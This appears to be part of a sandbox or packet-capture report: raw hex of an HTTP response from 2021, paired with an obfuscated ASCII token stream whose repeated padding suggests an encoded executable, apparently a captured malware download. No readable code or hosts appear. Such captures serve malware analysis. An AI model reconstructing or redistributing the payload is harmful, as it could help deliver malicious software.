                                                  2021-10-29 18:30:03 UTC2661INData Raw: 78 20 52 59 20 78 20 4f 6f 6f 20 78 20 74 74 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 4f 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 4f 20 78 20 59 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 6b 74 20 78 20 59 74 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 4f 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 52
                                                  Data Ascii: x RY x Ooo x tt x Oxk x tk x OOt x kQ x kk x RR x Ooo x Qt x tO x Yt x Kk x RY x RY x RR x OOE x RY x RQ x tk x OoO x Qx x kt x tx x Kk x Qx x kR x tK x Oxk x Qk x kt x Yt x Kk x Qx x kR x ko x OOO x QQ x OxQ x kR x OxK x Qx x RY x RY x RY x OOE x RY x RR
                                                  2021-10-29 18:30:03 UTC2662INData Raw: 20 4f 4f 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 6b 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 59 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 6b 51 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f
                                                  Data Ascii: OOY x RY x RY x RR x tk x RY x Oxk x tk x Oxk x Oxx x RQ x tk x KQ x QQ x OOx x tk x OOk x QQ x OxE x Rt x Yt x RY x kY x Oox x OOk x kQ x kt x ko x Rk x Oxx x kk x tK x Ooo x Qk x YO x tK x kk x RY x tx x OOY x RR x ko x Yx x kR x Kk x kY x YO x Oxk x O
                                                  2021-10-29 18:30:03 UTC2663INData Raw: 20 74 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 59 78 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 6b 59 20 78 20 74 4f 20 78 20 74 78 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 6b 74 20 78 20 59 45 20 78 20 4b 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 74 6b 20 78 20
                                                  Data Ascii: tk x RY x RQ x tK x Oxk x Qx x Yx x Oxk x OOt x kY x tO x tx x OOo x Qk x OOx x kO x RY x RY x kx x YR x RY x ko x Yx x kR x Kk x kO x Yx x Oox x OOo x Qx x kt x YE x Kk x kY x OxQ x kR x OxR x Oxx x RY x RR x Oxx x RY x kY x Oxx x Oxk x Oxx x tx x tk x
                                                  2021-10-29 18:30:03 UTC2665INData Raw: 74 20 78 20 6b 74 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 51 51 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 78 6b 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 4b 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 51 78 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 78 74 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20
                                                  Data Ascii: t x kt x YE x Oxt x Qk x YO x QQ x RY x OoO x RY x RR x tx x Qk x OxQ x ko x kO x kQ x kt x Oxk x OOt x Oxx x RY x RY x RY x Oxt x OOQ x tx x tK x Qk x OOx x Qx x OxK x Qk x tO x Oxk x Oxt x kQ x kk x ko x Oxk x kY x OxQ x kR x OxR x Oxx x RY x RY x RY x
                                                  2021-10-29 18:30:03 UTC2666INData Raw: 78 20 6b 6f 20 78 20 4f 78 51 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 45 20 78 20 52 52 20 78 20 6b 6f 20 78 20 59 78 20 78 20 6b 52 20 78 20 4b 6b 20 78 20 6b 4b 20 78 20 6b 74 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 6b 59 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4b 51 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 4f 20 78 20 6b 52 20 78 20 4f 4f 74 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78
                                                  Data Ascii: x ko x OxQ x Yt x OxR x Oxx x kk x tt x RY x RY x Rk x tE x RR x ko x Yx x kR x Kk x kK x kt x kR x OOt x Oxx x kY x Oxk x Kk x Qx x kt x KQ x Rk x Qk x YO x kR x OOt x Oxx x RY x RY x RY x ko x kO x tx x to x Qx x kk x ko x kO x kQ x kk x tK x Oxk x Qk x
                                                  2021-10-29 18:30:03 UTC2667INData Raw: 74 20 78 20 74 78 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 78 20 78 20 4b 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 74 78 20 78 20 51 6b 20 78 20 4f 4f 78 20 78 20 6b 52 20 78 20 4f 4f 52 20 78 20 6b 4f 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 74 4f 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 51 74 20 78 20 6b 74 20 78 20 59 45 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 59 4f 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20
                                                  Data Ascii: t x tx x Kk x Qx x kY x ko x OOo x kQ x kt x Oox x OOk x Qx x KQ x RR x OxK x QQ x OxQ x tx x OOR x kR x OOQ x RY x RY x OoO x OOQ x RR x tx x Qk x OOx x kR x OOR x kO x Yx x OxK x OOo x Qk x tO x ko x kk x Qt x kt x YE x Oxt x Qk x YO x Oxx x Ooo x RY x
                                                  2021-10-29 18:30:03 UTC2669INData Raw: 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 78 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 52 6b 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 6f 4f 20 78
                                                  Data Ascii: x RY x Oxk x tk x Oxk x Oxx x tx x ko x Oxk x OxO x to x ko x Rk x Qk x Yx x Oox x OOk x QQ x OxE x RY x RY x Qt x OOQ x tx x to x Qx x kk x ko x RQ x Qx x kk x Qx x OOo x kQ x Yx x kR x Rk x kQ x kk x RR x Ooo x RY x RQ x Oxx x RQ x kE x kK x tt x OoO x
                                                  2021-10-29 18:30:03 UTC2670INData Raw: 78 20 6b 59 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4b 6b 20 78 20 6b 52 20 78 20 74 4f 20 78 20 59 74 20 78 20 6b 4b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 59 20 78 20 4f 78 4b 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78
                                                  Data Ascii: x kY x OxQ x kR x Yx x Qx x kk x tK x Kk x kR x tO x Yt x kK x Qx x kt x Oox x OxQ x RY x RY x RY x KE x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kY x Yx x kR x OoO x Oxx x OxQ x Oxk x OxR x Qx x kY x OxK x OxK x Qk x OxQ x ko x OOY x Qx x kO x RY x RY x
                                                  2021-10-29 18:30:03 UTC2671INData Raw: 6f 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 4f 78 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20
                                                  Data Ascii: o x OxQ x Oxk x OOY x Qx x kR x QQ x RY x RY x RY x OOO x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x ko x Oxk x ko x kk x OxK x kk x RY x RY x OOY x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR
                                                  2021-10-29 18:30:03 UTC2673INData Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                  Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                  2021-10-29 18:30:03 UTC2674INData Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20
                                                  Data Ascii: Y x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x RY x RY x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x to x OxE x RY x RY x RY x Rt x
                                                  2021-10-29 18:30:03 UTC2675INData Raw: 51 20 78 20 59 52 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 4f 6f 6f 20 78 20 74 52 20 78 20 4f 6f 6f 20 78 20 4f 78 6f 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 6b 6b 20 78 20 6b 45 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 59 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 6b 78 20 78 20 4f 4f 6b 20 78 20 59 45 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4f 6f 78 20 78 20 4b 74 20 78 20 6b 78 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 74 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 6f
                                                  Data Ascii: Q x YR x kK x tt x OOQ x OOY x Ooo x tR x Ooo x Oxo x OOK x OxO x Oox x tE x kk x kE x Oxk x OOO x OxY x kK x Oxt x OOE x YK x OOO x YO x OOk x kx x OOk x YE x KE x OOk x Oox x Kt x kx x tR x OxK x OOR x tR x Kt x KQ x OOt x tR x Rt x OxK x OOO x OOK x Oo
                                                  2021-10-29 18:30:03 UTC2677INData Raw: 78 20 4b 45 20 78 20 4f 4f 52 20 78 20 59 59 20 78 20 52 51 20 78 20 4f 78 4b 20 78 20 4f 78 78 20 78 20 74 59 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 74 51 20 78 20 6b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 45 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 59 4b 20 78 20 4b 74 20 78 20 74 6f 20 78 20 59 52 20 78 20 59 52 20 78 20 4f 4f 74 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 74 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 74 4f 20 78 20 4f 78 59 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 4f 4f 6b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 78 51 20 78 20 59 4b 20 78 20 4f 4f 74 20 78 20 59 59 20 78 20 4f 78 59 20
                                                  Data Ascii: x KE x OOR x YY x RQ x OxK x Oxx x tY x kt x OxY x tK x tQ x kE x OOK x OOE x OxR x OxO x YR x KE x Kt x OOx x YK x Kt x to x YR x YR x OOt x tO x Kk x OOk x Kt x kt x Yo x OOY x tY x tO x OxY x OOk x tR x OxQ x OOk x OOO x YK x OxQ x YK x OOt x YY x OxY
                                                  2021-10-29 18:30:03 UTC2678INData Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59
                                                  Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                  2021-10-29 18:30:03 UTC2679INData Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52
                                                  Data Ascii: Y x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x R
                                                  2021-10-29 18:30:03 UTC2681INData Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 6b 59 20 78 20 52 59 20 78
                                                  Data Ascii: x RY x RY x RY x kO x RY x RR x RY x RY x RY x RY x tY x RY x tE x RY x OxE x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x RY x RY x RY x RY x RY x RY x RY x RY x OOQ x RR x OOt x RY x RY x RY x RY x kO x RY x tE x RY x OxE x tE x kY x RY x
                                                  2021-10-29 18:30:03 UTC2682INData Raw: 20 74 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 51 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 74 20 78 20 52 59 20 78 20 74 4b 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59
                                                  Data Ascii: tk x RY x RY x RQ x RY x RY x RY x Rt x kO x RY x OOQ x Rt x RY x tE x RY x RY x RY x RY x tY x OxE x Rk x RY x tE x RY x OxR x RY x RY x RY x RY x OOQ x RY x tt x RY x OxE x Rt x kQ x RY x RY x RY x Rk x kQ x RY x OOQ x Rt x RY x tK x OOQ x RY x RY x RY
                                                  2021-10-29 18:30:03 UTC2683INData Raw: 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 74 78 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20
                                                  Data Ascii: RY x kO x RY x RY x RY x Rt x OxE x tx x RY x tE x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x kO x RY x RY x RY x RQ x RY x tx x RY x tE x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                  2021-10-29 18:30:03 UTC2684INData Raw: 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20
                                                  Data Ascii: x kO x kO x RY x RY x tY x OxE x tx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rk x kO x kO x RY x RY x tR x OxE x tx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                  2021-10-29 18:30:03 UTC2686INData Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52
